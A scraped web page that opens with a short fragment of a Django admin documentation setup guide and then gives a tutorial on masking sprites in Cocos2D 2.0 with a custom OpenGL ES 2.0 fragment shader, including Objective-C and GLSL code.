admin.site.urls), ] The first line imports the include method from the django.urls package which is necessary to load the built-in urls from the admin site documentation app. Next, inside the urlpatterns list is the 'admin/doc/' path which tells Django to enable the admin site documentation app on the /admin/doc/ url (e.g.). Caution The admin/docpath must be declared before the admin/path for things to work. The url definition order matters, a topic that's discussed in the next chapter. Next, open the project's settings.py file and go to the INSTALLED_APPS variable. Near the final values in this variable add the line django.contrib.admindocs to enable the Django admin site documentation app. With the development web server running. Open a browser on the address and you should see a page like the one in figure 1-7. Figure 1-7.- Django admin site doc home page If you logged off the Django admin site, you'll need to login again to access the documentation since it also requires user authentication. Once you login, you'll be able to see the documentation home page for the Django admin site -- illustrated in figure 1-7 -- as well as the documentation on a project's controller methods and model objects. Caution If you receive the error TemplateDoesNotExist at /admin/doc/, this means you missed a prerequisite outlined earlier: either the docutils package wasn't installed with pip install docutilsor the django.contrib.admindocspackage wasn't added to the INSTALLED_APPSvariable in settings.py.
https://www.webforefront.com/django/setupdjangoadminsite.html
CC-MAIN-2021-31
refinedweb
1,451
56.35
loadrdsfig.3alc - Man Page give back a pointer to a figure Synopsis #include "rtlnnn.h" void loadrdsfig( Figure, Name, Mode ) rdsfig_list ∗Figure; char ∗Name; char Mode; Parameter - Figure Pointer to the RDS Figure created. - Name Name of the model of the figure. - MODE : Caracter indicating the status of the figure in memory. This field can take three values : - ´A´ All the cell is loaded in ram (The figure, its rectangles and its instances empty). - ´P´ Only information concerning the model interface is present, that means : connectors, the abutment box and through routes of the figure. - ´V´ Visualization mode : all is loaded in RAM : The figure, its rectangles, its instances and the rectangles of its instances. Description The loadrdsfig function loads in memory a cell model from disk. The loadrdsfig function in fact performs a call to a parser ,chosen by the RDS_IN environment variable. Return Value The pointer to the created figure. (it's the parameter ´Figure´ of the loadrdsfig function). Errors "Rtl103.h: Unknown rds input format" The input format defined by the unix environment variable RDS_IN is not supported by the driver (supported formats are "cif" and "gds"). Other errors can appear because the loadrdsfig function calls cif and gds parsers. Example #include "mutnnn.h" #include "rdsnnn.h" #include "rtlnnn.h" main() { rdsfig_list ∗RdsFigure; mbkenv(); rdsenv(); loadrdsparam(); /∗ ∗/ loadrdsfig (RdsFigure, "core", 'A'); viewrdsfig( Figure ); } See Also librtl, getrdsfig, rdsenv, RDS_IN
https://www.mankier.com/3/loadrdsfig.3alc
CC-MAIN-2021-21
refinedweb
231
58.08
Access a Xpresso node via python tag? [SOLVED] On 22/03/2016 at 02:09, xxxxxxxx wrote: Hey Guys ^^ so, what I want to do is, to access the "Output Upper" of an RangeMapper via a Python Tag. I want to use this like an multiplier with an Float Field from my User Data. I have tried it like this: import c4d def main() : obj_ps = doc.SearchObject("Null") multi = obj_ps[c4d.ID_USERDATA,29] #This is the float field xpresso_tag = obj_ps.GetFirstTag() node_master = xpresso_tag.GetNodeMaster() node = node_master.AllocNode(c4d.ID_OPERATOR_RANGEMAPPER) node[c4d.GV_RANGEMAPPER_RANGE22] = multi I tried it like this because I only have one Range Mapper in my Xpresso. but this seems to be not working. Well, it actually does nothing at all, but I don't get an error or something. So yeah, is it actually possible, or am I just to stupid to get it right? thanks in advance, neon On 22/03/2016 at 03:21, xxxxxxxx wrote: Hello, in your code your are not accessing an existing node. You are allocating a new node (AllocNode) and that node is not inserted into anything. So if you are searching for a specific node you have to get the root node (GetRoot()) and search its child nodes for the node you want to edit. node_master = xpresso_tag.GetNodeMaster() if node_master is None: return root = node_master.GetRoot() if root is None: return first = root.GetDown() if first is not None: if first.GetOperatorID() == c4d.ID_OPERATOR_RANGEMAPPER: first[c4d.GV_RANGEMAPPER_RANGE22] = 123 Best wishes, Sebastian On 01/04/2016 at 09:20, xxxxxxxx wrote: Hello Neon, was your question answered? Best wishes, Sebastian On 01/04/2016 at 10:37, xxxxxxxx wrote: Hello Sebastian, Yes it was! I actually thought I have already written a reply to your answer, I am sorry. greetings, neon
https://plugincafe.maxon.net/topic/9409/12598_access-a-xpresso-node-via-python-tag-solved/1
CC-MAIN-2020-24
refinedweb
300
66.94
> If . Well, looking at the code of `IsEndOfInvokedMacro()` again, it _strongly_ reeks of scenario (A): return (Cond_Stack.back().PMac->endPosition == CurrentFilePosition()) && (Cond_Stack.back().PMac->source.fileName == mTokenizer.GetInputStreamName()); should probably be swapped around, like so: return (Cond_Stack.back().PMac->source.fileName == mTokenizer.GetInputStreamName()) && (Cond_Stack.back().PMac->endPosition == CurrentFilePosition()); so that the `LexemePosition` comparison operator is only invoked if the file names match. I guess you got really lucky in your test (and the OP unlucky in their use case), in that you happen to have created the following scenario: - A macro is invoked. - That macro includes a different file. - That included file happens to have a `#` (e.g. `#declare`) at the same file offset as the `#end` of the macro. - However, the `#` happens to be in a different line and/or column. In such a scenario, encountering the `#`, the parser would first test whether this is the `#end` of the macro it has been waiting for, calling `IsEndOfInvokedMacro()`. `IsEndOfInvokedMacro()` in turn would checks whether the current file position matches that of the macro's `#end` by calling `LexemePostition::operator==`. `LexemePostition::operator==` in turn would find that the file position does match. It would then verify that the match also reflects in line and column, and find that they differ, and report this inconsistency via an Exception. `IsEndOfInvokedMacro()` wouldn't even get a chance to test whether it is looking at the right file, because its author (duh, I wonder who that stupid git might have been...) chose to do the two tests in the wrong order. Now aside from the stupid git who authored `IsEndOfInvokedMacro()` there's someone else to blame for the situation, namely whoever thought it was a good idea to keep the stack of include files separate from the stack of pending "conditions". If they were using one and the same structure, having `INVOKING_MACRO_COND` on top of the stack would imply that we're in the file with the `#end`, and the file name test would be redundant. I think it should be possible to merge the include stack into the "condition" stack without adverse effects, but I haven't finished work on that yet. I should note that I haven't tested this hypothesis and fix for the error yet; I intend to do that as soon as I find the time, but of course you're welcome to beat me to it.
https://news.povray.org/povray.bugreports/message/%3C5c996733%241%40news.povray.org%3E/#%3C5c996733%241%40news.povray.org%3E
CC-MAIN-2022-40
refinedweb
397
60.14
Plz mail to tomcat Tomcat Quick Start Guide Tomcat Quick Start Guide This tutorial is a quick reference of starting development... fast tomcat jsp tutorial, you will learn all the essential steps need to start Tomcat Quick Start Guide Struts Quick Start Struts Quick Start Struts Quick Start to Struts technology In this post I will show you how you can quick start the development of you struts based project... of the application fast. Read more: Struts Quick Start Java guide Java guide Any beginner requires guidance to start with. A beginner in the field of java... practical guide to the beginner and experienced java programmer. These tutorials have Quick Sort In Java Quick Sort in Java  ... to sort integer values of an array using quick sort. Quick sort algorithm is developed by C. A. R. Hoare. Quick sort is a comparison sort. The working quick sort quick sort sir, i try to modify this one as u sugess me in previous... static void quick_srt(int array[],int low, int n){ int lo = low; int hi... = lo; lo = T; } quick_srt(array, low, lo); quick_srt(array SEO Guide,Free Search Engine Optimization Guide,SEO Guide from Webmasters SEO Guide SEO is the abbreviation for search engine optimization... is get indexed in the google, you will start getting tons of hits to your web site Struts 2 Guide directory. Now start the tomcat and type 2 Guide This is first.... You must finish this Struts 2 Guide in day 1 itself. Struts is vast topic The Beginners Linux Guide The Beginner's Guide to Linux Dedicated website to Linux containing Online...; Beginner Guide to Linux Server As a beginner you... Mouse in X mini-HOWTO Updated: Nov 2001. Quick Waiting for ur quick response Waiting for ur quick response Hi, I have two different java programs like sun and moon. In both of these two programs i have used same class name like A. For example, File name:sun.java Then the code is here: Class Reference Struts Reference Welcome to the Jakarta Online Reference page, you will find everything you need to know to quick start your Struts Project. Here we are providing you detailed Struts Reference. This online struts Please help need quick!!! Thanks Please help need quick!!! Thanks hey i keep getting stupid compile errors and don't understand why. i'm supposed to use abstract to test a boat race simulation program of sorts here is my code: RentforthBoatRace.java public XML Interviews Question page5,xml Interviews Guide,xml Interviews (top level) element (start-tag plus end-tag) which encloses everything else...) inside some start-tags. XML documents can be very simple, with straightforward XML Interviews Question page24,xml Interviews Guide,xml Interviews validation If I start using XML namespaces, do I need XML Interviews Question page26,xml Interviews Guide,xml Interviews or attribute name can appear: in start and end tags, as the document element type XML Interviews Question page1,xml Interviews Guide,xml Interviews goal of XML as defined in the quotation at the start of this section. Combining XML Interviews Question page23,xml Interviews Guide,xml Interviews . To start with, declare three parameter entities in your DTD: <!ENTITY % p Complete Webhosting Guide, Search Web hosts, Find Plans will provide you complete guide on web hosting and show you how you can use the web hosting services to host your website and web portals. This guide... and start earning money from your web site.   Quick Sort in Java Quick sort in Java is used to sort integer values of an array. It is a comparison sort. Quick sort is one of the fastest and simplest sorting algorithm... sort, etc. The complexity of quick sort in the average case is Θ(n log n Quick Sort in Java is used to sort elements of an array. Quick sort works on divide and conquer strategy and comparison sort... into two sub-arrays. The complexity of quick sort in the average case is &Theta Learn to tomcat programsSachin Gangurde April 4, 2012 at 1:57 PM Plz mail to tomcat setup Apache tomcat server start up problemmadhusekhar July 5, 2013 at 7:11
http://www.roseindia.net/discussion/24206-Tomcat-Quick-Start-Guide.html
CC-MAIN-2014-10
refinedweb
694
63.9
Details Description This is basically to cut my teeth for much more ambitious code generation down the line, but I think it could be performance and useful. the new syntax is: a = load 'thing' as (x:chararray); define concat InvokerGenerator('java.lang.String','concat','String'); define valueOf InvokerGenerator('java.lang.Integer','valueOf','String'); define valueOfRadix InvokerGenerator('java.lang.Integer','valueOf','String,int'); b = foreach a generate x, valueOf(x) as vOf; c = foreach b generate x, vOf, valueOfRadix(x, 16) as vOfR; d = foreach c generate x, vOf, vOfR, concat(concat(x, (chararray)vOf), (chararray)vOfR); dump d; There are some differences between this version and Dmitriy's implementation: - it is no longer necessary to declare whether the method is static or not. This is gleaned via reflection. - as per the above, it is no longer necessary to make the first argument be the type of the object to invoke the method on. If it is not a static method, then the type will implicitly be the type you need. So in the case of concat, it would need to be passed a tuple of two inputs: one for the method to be called against (as it is not static), and then the 'string' that was specified. In the case of valueOf, because it IS static, then the 'String' is the only value. - The arguments are type sensitive. Integer means the Object Integer, whereas int (or long, or float, or boolean, etc) refer to the primitive. This is necessary to properly reflect the arguments. Values passed in WILL, however, be properly unboxed as necessary. - The return type will be reflected. This uses the ASM API to generate the bytecode, and then a custom classloader to load it in. I will add caching of the generated code based on the input strings, etc, but I wanted to get eyes and opinions on this. I also need to benchmark, but it should be native speed (excluding a little startup time to make the bytecode, but ASM is really fast). Another nice benefit is that this bypasses the need for the JDK, though it adds a dependency on ASM (which is a super tiny dependency). Patch incoming. Issue Links Activity Jon, the problem with non-static methods was that what people really wanted was to be able to construct the object to call methods on (as opposed to just invoking the no-arg constructor for every invocation). Any thoughts on how to achieve that? I'm not quite sure what you mean...could you illustrate it with a quick code snippet? I am thinking about this and what I think you mean, is that if you say define concat InvokerGenerator('java.lang.String','concat','String') you don't want it to do: return new String().concat((String)input.get(0)); So what it does is it uses the argument list (the 3rd parameter) to find a matching method. If it is not static, then it will expect n+1 arguments, where the 1st one will be an instance of the object on the left (in the case java.lang.String) which will serve as a method receiver. So in the case of concat, it would expect 2 Strings. If it is static, it only expects the argument list. Is that what you were talking about, or something else? Not quite – what I mean is that people want to be able to say, effectively: Foo foo = new Foo(1, 2, 'some_string'); for (Tuple t : tuples) { foo.someMethod(t); } I think the problem with invokers isn't that they are slow. It's that they are cumbersome to use. Not sure making them faster is really the place to focus.. integrating them deeper would be interesting (why can't we just see that you are saying java.lang.String.concat('foo', $1) and auto-generate or auto-wrap a UDF?). Ah, ok. Well, first, since we have a more performance, less verbose syntax (mainly not having to say "InvokeForLong" vs "InvokeForString" and so on), I think it's worth including it because it IS faster and cleaner, though I agree that the focus now should be on filling a niche that doesn't currently exist. As I said before, the work so far was in a big part to be a small project to begin to work with ASM with, and benefit pig on the side. I do like the idea of potentially supporting math function syntax, and then behind the scenes generating the scaffolding. I like that idea a lot. Will mull on how it'd be implemented. Perhaps a first pass would be to support a MATH keyword where if you do MATH.operator(stuff, stuff) it generates the scaffolding, and then it can get more generic? I don't really know how to do this without adding keywords... hmm hmm hmm. Would love thoughts in that vein. But what you bring up is an interesting use case...sort of the generation of UDF's based on some class that exists. What your proposing sounds like we could generate an accumulator UDF that would apply to any case where you have an object that you instantiate on the mapper, then stream everything through and return. Ideally we'd provide an interface that objects could implement that would serve as the bridge. Perhaps something like public Object eval(Object... o) throws IOException; that way they don't even have to depend on pig in the object? I'm a bit confused about the math keyword stuff. I meant just generically being able to invoke (or generate code that wraps) methods on objects, the way one would initialize an object inside a UDF constructor and then call methods on that method during UDF exec methods. what about this? - call of a static method the same way a non-defined UDF can be: a = load 'thing' as (x:long); b = foreach a generate java.lang.Math.sqrt(x) as sqrt; - definition of a UDF through an expression (for a strict definition of those expressions). c = load 'thing' as (x:bag{t:(v:chararray)}); DEFINE join com.google.common.base.Joiner.on('-').skipNulls().join; d = foreach c generate join(x); An expression being defined as follows: {class}.{static method|constructor}([{primitive value}[,{primitive value}]*])[.{method}([{primitive value}[,{primitive value}]*])]*.{method} The exact method to use can be evaluated through reflection using the expression and input schema. - For methods called on the incoming objects (ex: concat) there is a finite set of those as they are the methods available on the types supported by Pig, they can just all be defined as builtins once and for all. That would simplify the other cases above. I don't know that I like including all of the methods for types supported by Pig...if anything, I think we should try and move towards a solution that requires less code like that. Why cruft up the code base with a bunch of wrappers? In that vein, I really like your first proposal. I think it's definitely the direction we should go. As far as a syntax to allow people to call methods that require an object, how about: a = load 'thing' as (a:chararray, b:chararray); b = foreach a generate a:sqrt(b) as sqrt; I'd love to use $, but I see the potential for namespace collision to be too great, not to mention ambiguity on the parser. It doesn't have to be : of course, but I don't think . will work. But perhaps I'm wrong? Either way, I think this is one of those cases where we should shoot for a really usable syntax. In both of these cases, we could use the InvokerGenerater and reflection to figure out all of the necessary code. As far as the defintion of the UDF, I think that the mentioned approach is not a bad one. Another possibility: c = load 'thing' as (x:bag{t:(v:chararray)}); DEFINE joiner NEW com.google.common.base.Joiner.on('-').skipNulls(); d = foreach c generate joiner:join(x); This would introduce a new keyword which would allow us to more succinctly reference one object with various methods we want to use. The define would register this string in the namespace, and then when we see a :, first we see if what is to the left is a relation, then we see if it is in the object space. If it is, then we can build up the UDF. I think we're heading in the right direction, whatever we choose. Also, as an aside, I think it'd be awesome to make it so people didn't have to do the fully qualified classname, at least for stuff in java.lang... is there a reason why java.lang can't be added to the list returned by PigContext.getPackageImportList()? I suppose people can add it to the pig properties or whatever, but it seems like an intelligent base, at least? Love Julien's proposal, that reads like what I expect it to read. Except at some point down that road we discover ourselves writing java without IDE support.. Is supporting chaining method calls a bit much? Jon, I'm not following your bit of sample syntax with the ":" – possibly due to variable collision (is "a" a defined object, or a relation?) I was worried about the "writing java without IDE support" issue, but I think as long as our scope is narrow, the win is worth it. I like Julien's proposal as well, but I guess I feel like we might as well push it to the next level? DEFINE join com.google.common.base.Joiner.on('-').skipNulls().join; d = foreach c generate join(x); the hanging "join" at the end of the define statement seems odd to me. Why not just let people call wahtever method they want? And Dmitriy, I guess the ":" syntax is a little awkward, but the idea is that if you had "relation:method(relation*)", it invoke that method on the relation with the appropriate arguments. Or, in the same vein, if you had "joiner:join(relation*)", it'd invoke the method on the object that will be created viz. the DEFINE statement. I think some sort of syntax allowing us to call methods of various pig types directly would be pretty neat, though. The syntax could be something bigger to highlight that it's kind of a big thing. "joiner=>join(relation*)", I dunno. Another thought for this sort of thing: This might be achievable without bytecode generation and good performance with Java 7 MethodHandles [1][2]. Of course, that would require Java 7, but Java 6 support ends later year [3], about the time Pig 0.11 would be out anyway. [1] [2] [3] Scott, good idea but moving Pig to java 7 would require running on a Hadoop that's running on Java 7... that might take a while. Though I think Oracle's working on figuring out what that would take, now that they have a hadoop integration team. this will go in a future version I don't know why this never got +1'd, I think we got derailed be the conversation near the end. I have updated it and added some tests. I don't see why we shouldn't commit this? It's strictly better than what we have, and I will make a new JIRA for the broader issue of trying to get rid of having to make a builtin for everything. Oh, I also should add tests. Can leverage the tests Dmitriy used for his.
https://issues.apache.org/jira/browse/PIG-2643?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
CC-MAIN-2015-32
refinedweb
1,938
72.16
This is the assignment im doing. Write a program that reads integer data from the standard input unit and prints a list of the numbers followed by the minimum integer read, maximum integer read, and the average of that list. Test your program with the data shown below. {24 7 31 -5 64 0 57 -23 7 63 31 15 7 -3 2 4 6} This is c programming btw. Now i think i know basically what to do, the program needs an input device and then the program loops all the data input until theres nothing left to input. You would use an address like int x; and as you cycle through the numbers if the number your looking at is greater (or less than depending on which function you doing) it gets put in the int x slot, then you print out int x at the end. My big problem is i dont know an input device that lets you put in any amount of integers. I could use scanf(); and scan a predetermined amount of integers but im not sure if theres some way to tweak scanf or if theres some command i missed when i didnt attend the lecture. Also, im not sure how i would know how to make my program quit looping after its evaluated all the numbers, like i said before if i knew that there where 5 integers being evaluated i could set a counter to decrease by one so that when the counter hits 0 the loop ends. Is there some way i can do this where the counter changes based on the number of integers input? I hate programming so coming here makes it as painless as possible for me. Looking through the book this is what ive pieced together so far, im pretty sure it doesnt work, its not close to done anyways. Ill be looking here from time to time most of the night, thanks in advance for any help.Ill be looking here from time to time most of the night, thanks in advance for any help.Code: #include <stdio.h> #include <stdlib.h> int main() { int avg; int max; int min; int x; int newent; printf("\nEnter your integers: <EOF> to stop\n"); newent = scanf("%d", &x); if (newent > max) max = newent; if (newent < min) min = newent; printf("Your average is: %d \n Your maximum is: %d \n Your minumum is: %d \n", avg, max, min); system("PAUSE"); return 0; }
http://cboard.cprogramming.com/c-programming/87948-need-some-help-coding-printable-thread.html
CC-MAIN-2016-18
refinedweb
414
72.7
We spend O(n) time on padding each row, resulting in an O(n * rows)-time solution. Here, n denotes the number of sentences. Conceptually, each row consists of the following three parts: - a nullable suffix of the given list, followed by - as many as complete given lists, followed by - a nullable proper prefix of the given list Part 1 and 3 can be handled by brute-force in O(n) time, and part 2 can be done in O(1) time via a division after we pre-compute the total length of the sentences. Therefore, the overall runtime is O(n * rows). public class Solution { public int wordsTyping(String[] sentence, int rows, int cols) { int sum = 0, ans = 0, which = 0; for (String s : sentence) sum += s.length(); for (int i = 0; i < rows; i++) { int remaining = cols + 1; // reserve an extra space for the dummy space to the left of the first letter while (which < sentence.length && sentence[which].length() + 1 <= remaining) remaining -= sentence[which++].length() + 1; if (which >= sentence.length) { which = 0; ans = ans + 1 + remaining / (sum + sentence.length); remaining %= sum + sentence.length; while (which < sentence.length && sentence[which].length() + 1 <= remaining) remaining -= sentence[which++].length() + 1; } } return ans; } } Nice solution! Just for a little bit simplicity, no need to suffix and prefix(for the first while loop in for loop), just count how many whole length and start from last index, see my c++ code class Solution { public: int wordsTyping(vector<string>& sentence, int rows, int cols) { int sum = 0; for (auto s: sentence) { if (s.size() > cols) { return 0; } sum += s.size()+1; } int length = sentence.size(); int index = 0, count = 0; for (int i = 0; i < rows; i++) { int locations = cols + 1; count += locations / sum; locations %= sum; while (locations >= sentence[index].size() + 1) { locations -= sentence[index++].size() + 1; if (index == length) { count++; index = 0; } } } return count; } }; Looks like your connection to LeetCode Discuss was lost, please wait while we try to reconnect.
https://discuss.leetcode.com/topic/62297/a-simple-simulation
CC-MAIN-2017-39
refinedweb
328
64.2
How To Mask a Sprite with Cocos2D 2.0 In the previous tutorial, we showed you how to mask a sprite with Cocos2D 1.0. This method worked OK, but it had some drawbacks – it bloated our texture memory and had a performance hit for the drawing. But with Cocos2D 2.0 and OpenGL ES 2.0, we can do this much more efficiently by writing a custom shader! This tutorial will be our first foray into the new and exciting Cocos2D 2.0 branch. You’ll learn how to get started with the new Cocos2D 2.0 branch, and how to write a custom shader for a CCNode! To fully understand this tutorial, it will really help to have some basic understanding of OpenGL ES 2.0 first. If you are new to OpenGL ES 2.0, check out the OpenGL ES 2.0 for iPhone tutorial series first. Without further ado, let’s get masking with shaders! Introducing Cocos2D 2.0 Branch Cocos2D 2.0 is a major new version of Cocos2D that uses OpenGL ES 2.0 instead of OpenGL ES 1.0. This means some older devices that don’t support OpenGL ES 2.0 can’t run apps made with thie branch, but most devices are OpenGL ES 2.0 compatible these days, so it’s becoming more and more of a decent business decision to use it. Because even though some older devices can’t run it – it gives us lots of cool new things to play with, primarily OpenGL ES 2.0 shaders! And as you’ll see, using shaders makes masking much more efficient. The Cocos2D 2.0 branch is still under active development, but is now available for early adopters. And that means us! :] The only way to get the Cocos2D 2.0 branch is by grabbing it from the git repository, so if you don’t have git installed already, download it here. Then go to Applications\Utilities, and click on your Terminal app. Navigate to a directory of your choosing, and then issue the following command: git clone Once it finishes downloading, switch to the cocos2d-iphone directory and check out the Cocos2D 2.0 branch (called gles20) as follows: cd cocos2d-iphone git checkout gles20 Next, go ahead and install the new Cocos2D 2.0 templates. This will overwrite your current Cocos2D templates, but that’s OK – personally I just keep the 1.0 and 2.0 directories somewhere handy, and run install-templates.sh again from whichever version of Cocos2D I need the templates from. ./install-templates.sh -f -u Back in Xcode, go to File\New\New Project, choose iOS\cocos2d\cocos2d, and click Next. Name the new project MaskedCal2, click Next, choose a folder to save the project in, and click Create. If you try to Compile and Run, you’ll see… a blank screen? This threw me for a loop the first time I was playing around with the new branch. Luckily the solution is simple – the templates don’t include some required files you need. To add the required files, open the cocos2d-ios.xcodeproj from where you downloaded the github repository, and drag the Resources\Shaders folder into your Xcode project. Very important: When you drag the folder over, make sure that “Copy items into destination group’s folder” is selected, and “Create folder references for any added folders” is selected. By selecting the “folder references” option, the shaders files will be copied into a subdirectory of your bundle, which is where Cocos2D is looking. Compile and run, and you should see a Hello World for Cocos2D 2.0 with OpenGL ES 2.0! Creating a Simple Cocos2D 2.0 Project Let’s get our project set up to just cycle through the list of calendar images like we did before, before we turn to masking. Like you did before, drag the resources for this project into your Xcode project. Make sure that “Copy items into destination group’s folder (if needed)” is checked and “Create groups for any added folders” is selected, and click Finish. is the same as last time. Then open up RootViewController.m and inside shouldAutorotateToInterfaceOrientation, replace the return YES with the following: return ( UIInterfaceOrientationIsLandscape( interfaceOrientation ) ); This sets up the app to only support landscape mode (not sure why it’s not set up that way in the Cocos2D 2.0 templates).; This is also the same as last time. Finally make the following changes to HelloWorldLayer.m: //]; // BEGINTEMP CCSprite * cal = [CCSprite spriteWithFile:spriteName];; } Yet again – same as last time (except the begintemp/endtemp positions slightly changed). So you see, the user API didn’t really change much in Cocos2D 2.0 – it just has some extra awesome features you’re about to see :] Compile and run, and the app should display the cycling list of calendars like before, but using Cocos2D 2.0 and OpenGL ES 2.0 now! Shaders and Cocos2D 2.0 Cocos2D 2.0 comes with several built-in shaders that are used by default. In fact, those are the files missing from the template that you copied in earlier. Let’s take a look at the shaders that are used to render a normal CCSprite. They’re pretty simple. The vertex shader is Shaders\PositionTextureColor.vert: attribute vec4 a_position; attribute vec2 a_texCoord; attribute vec4 a_color; uniform mat4 u_MVMatrix; uniform mat4 u_PMatrix; varying vec4 v_fragmentColor; varying vec2 v_texCoord; void main() { gl_Position = u_PMatrix * u_MVMatrix * a_position; v_fragmentColor = a_color; v_texCoord = a_texCoord; } This multiplies the vertex position by the projection and model/view matrices, and sets the fragment color and texture coord output varyings to the input attributes. Next take a look at the fragment shader in Shaders\PositionTextureColor.frag: #ifdef GL_ES precision lowp float; #endif varying vec4 v_fragmentColor; varying vec2 v_texCoord; uniform sampler2D u_texture; void main() { gl_FragColor = v_fragmentColor * texture2D(u_texture, v_texCoord); } This sets the output color to the texture’s color multiplied by the color value on the vertex (set in Cocos2D with setColor). Cocos2D makes it very easy to replace the shaders you use to draw a node with your own custom shaders. Let’s start by creating a shader to use to implement masking, then we’ll create a subclass of CCSprite and set it up to use the custom shader. In Xcode, go to File\New\New file, choose iOS\Other\Empty, and click Next. Name the new file Mask.frag, and click Save. Then click on your Project properties, select your MaskedCal2 target, select the Build Phase tab, look for Mask.frag under the “Compile Sources” tab and move it down into the “Copy Bundle Resources” section. This will make it copy the shader into your app’s bundle rather than trying to compile it. (By the way, if anyone knows an easier way to make this happen let me know!) Then replace the contents of Mask.frag with the following: #ifdef GL_ES precision lowp float; #endif varying vec4 v_fragmentColor; varying vec2 v_texCoord; uniform sampler2D u_texture; uniform sampler2D u_mask; void main() { vec4 texColor = texture2D(u_texture, v_texCoord); vec4 maskColor = texture2D(u_mask, v_texCoord); vec4 finalColor = vec4(texColor.r, texColor.g, texColor.b, maskColor.a * texColor.a); gl_FragColor = v_fragmentColor * finalColor; } Here we set up a new uniform for the mask texture, and read in the pixel value in the calendar texture and mask texture. Then we construct the final color as the calendar’s RBG, but multiply the alpha component by the mask’s alpha. So wherever the mask’s alpha is 0 (transparent) the calendar will also be transparent. w00t now we’ve got a shader – so let’s make use of it! Using a Custom Shader in Cocos2D 2.0 To use a custom shader, you need to create a subclass of CCNode, set its shaderProgram to your custom shader, and (most likely) override its draw method to pass the appropriate parameters to the shader. We’re going to create a subclass of CCSprite (which is fine because it derives from CCNode), and call it MaskedSprite. Let’s try it out. Go to File\New\New File, choose iOS\Cocoa Touch\Objective-C class, and click Next. Enter CCSprite for Subclass of, click Next, name the new file MaskedSprite.m, and click Save. Replace MaskedSprite.h with the following: #import "cocos2d.h" @interface MaskedSprite : CCSprite { CCTexture2D * _maskTexture; GLuint _textureLocation; GLuint _maskLocation; } @end Here we have an instance variable to keep track of the mask texture, and two variables to keep track of the texture uniform’s location, and the mask uniform’s location. Next switch to MaskedSprite.m and replace the contents with the following: #import "MaskedSprite.h" @implementation MaskedSprite - (id)initWithFile:(NSString *)file { self = [super initWithFile:file]; if (self) { // 1 _maskTexture = [[[CCTextureCache sharedTextureCache] addImage:@"CalendarMask.png"] retain]; // 2 self.shaderProgram = [[[GLProgram alloc] initWithVertexShaderFilename:@"Shaders/PositionTextureColor.vert" fragmentShaderFilename:@"Mask.frag"] autorelease]; CHECK_GL_ERROR_DEBUG(); // 3 [shaderProgram_ addAttribute:kCCAttributeNamePosition index:kCCAttribPosition]; [shaderProgram_ addAttribute:kCCAttributeNameColor index:kCCAttribColor]; [shaderProgram_ addAttribute:kCCAttributeNameTexCoord index:kCCAttribTexCoords]; CHECK_GL_ERROR_DEBUG(); // 4 [shaderProgram_ link]; CHECK_GL_ERROR_DEBUG(); // 5 [shaderProgram_ updateUniforms]; CHECK_GL_ERROR_DEBUG(); // 6 _textureLocation = glGetUniformLocation( shaderProgram_->program_, "u_texture"); _maskLocation = glGetUniformLocation( shaderProgram_->program_, "u_mask"); CHECK_GL_ERROR_DEBUG(); } return self; } @end There’s a lot to discuss here, so let’s go over it section by section. - Gets a reference to the texture for the calendar mask. - Overrides the built-in shaderProgram property on CCNode so that we can specify our own vertex and fragment shader. We use the built-in PositionTextureColor vertex shader (since nothing needs to change there) but specify our new Mask.frag fragment shader. Note that this GLProgram class is the same one from Jeff LaMarche’s blog post! - Sets the indexes for each attribute before linking. In OpenGL ES 2.0, you can either specify the indexes for attributes yourself in advance (like you see here), or let the linker decide them for you and get them after the fact (like I’ve done in the OpenGL ES 2.0 tutorial series). - Calls shaderProgram link to compile and link the shaders. - Calls shaderProgam updateUniforms, which is an important Cocos2D 2.0-specific method. Remember those projection and model/view uniforms in the vertex shader? This method keeps track of where these are in a dictionary, so Cocos2D can automatically set them based on the position and transform of the current node. - Gets the location of the texture and mask uniforms, we’ll need them later. Next, we have to override the draw method to pass in the appropriate values for the shaders. Add the following method next: -(void) draw { // 1 ccGLBlendFunc( blendFunc_.src, blendFunc_.dst ); ccGLUseProgram( shaderProgram_->program_ ); ccGLUniformProjectionMatrix( shaderProgram_ ); ccGLUniformModelViewMatrix( shaderProgram_ ); // 2 glActiveTexture(GL_TEXTURE0); glBindTexture( GL_TEXTURE_2D, [texture_ name] ); glUniform1i(_textureLocation, 0); glActiveTexture(GL_TEXTURE1); glBindTexture( GL_TEXTURE_2D, [_maskTexture name] ); glUniform1i(_maskLocation, 1); // 3 #define kQuadSize sizeof(quad_.bl) long offset = (long)&quad_; // vertex NSInteger diff = offsetof( ccV3F_C4B_T2F, vertices); glVertexAttribPointer(kCCAttribPosition, 3, GL_FLOAT, GL_FALSE, kQuadSize, (void*) (offset + diff)); // texCoods diff = offsetof( ccV3F_C4B_T2F, texCoords); glVertexAttribPointer(kCCAttribTexCoords, 2, GL_FLOAT, GL_FALSE, kQuadSize, (void*)(offset + diff)); // color diff = offsetof( ccV3F_C4B_T2F, colors); glVertexAttribPointer(kCCAttribColor, 4, GL_UNSIGNED_BYTE, GL_TRUE, kQuadSize, (void*)(offset + diff)); // 4 glDrawArrays(GL_TRIANGLE_STRIP, 0, 4); glActiveTexture(GL_TEXTURE0); } Let’s go over each section here as well: - This is boilerplate code to get things set up. It sets up the blend function for the node, uses the shader program, and sets up the projection and model/view uniforms. - Here we bind the calendar texture to texture unit 1, and the mask texture to texture unit 2. I discuss how this works in the OpenGL ES 2.0 Textures Tutorial. - CCSprite already contains the code to set up the vertices, colors, and texture coordinates for us – it stores it in a special variable called quad. This section specifies the offset within the quad structure for the vertices, colors, and texture coordinates. - Finally, we draw the elements in the quad as a GL_TRIANGLE_STRIP, and re-activate texture unit 0 (otherwise texture unit 1 would be left bound, and Cocos2D assumes texture unit 0 is left active). Almost done! Switch to HelloWorldLayer.m and make the following modifications: // Add to top of file #import "MaskedSprite.h" // Replace code between BEGINTEMP and ENDTEMP with the following MaskedSprite * maskedCal = [MaskedSprite spriteWithFile:spriteName]; maskedCal.position = ccp(winSize.width/2, winSize.height/2); [self addChild:maskedCal]; That’s it! Compile and run, and you now have masked sprites with Cocos2D 2.0 and OpenGL ES 2.0! The best thing about this method is we don’t have to create any extra textures – we just have the original textures and the mask texture in memory, and can create the masked version dynamically at runtime! Where to Go From Here? Here is a sample project with the code from the above tutorial. That’s it for this tutorial series – hopefully you can start having a lot of fun with masking and Cocos2D – whichever version you choose to use! If you want to learn more about Cocos2D 2.0, at the time of writing, there isn’t a lot of documentation on Cocos2D 2.0, so the best way to learn is by looking at the source and playing around with the new ShaderTest example. If you want to learn more about shaders, I recommend Philip Rideout’s iPhone 3D Programming – it’s what I used to get started. If you have any questions or comments, feel free to join the forum 